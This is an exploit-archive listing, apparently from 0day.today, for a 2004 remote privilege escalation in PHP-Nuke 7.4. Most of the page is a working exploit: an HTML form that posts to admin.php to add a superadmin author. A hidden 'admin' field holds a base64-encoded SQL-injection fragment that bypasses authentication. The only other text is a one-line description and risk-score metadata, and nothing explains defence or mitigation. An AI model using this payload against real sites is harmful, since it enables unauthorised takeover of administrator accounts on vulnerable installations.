PHP-Nuke 7.4 Remote Privilege Escalation

🗓️ 08 Sep 2004 00:00:00Reported by mantraType

zdt🔗 0day.today👁 37 Views

PHP-Nuke 7.4 allows remote privilege escalation via a form to create an admin user.

========================================
PHP-Nuke 7.4 Remote Privilege Escalation
========================================




A demonstration exploit HTTP form is provided:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME: 
<input type="text" name="add_aid">
<br>
NOME: 
<input type="text" name="add_name">
<br>
PASSWORD: 
<input type="text" name="add_pwd">
<br>
E-MAIL: 
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>



#  0day.today [2018-01-05]  #

08 Sep 2004 00:00Current

7.1High risk

Vulners AI Score7.1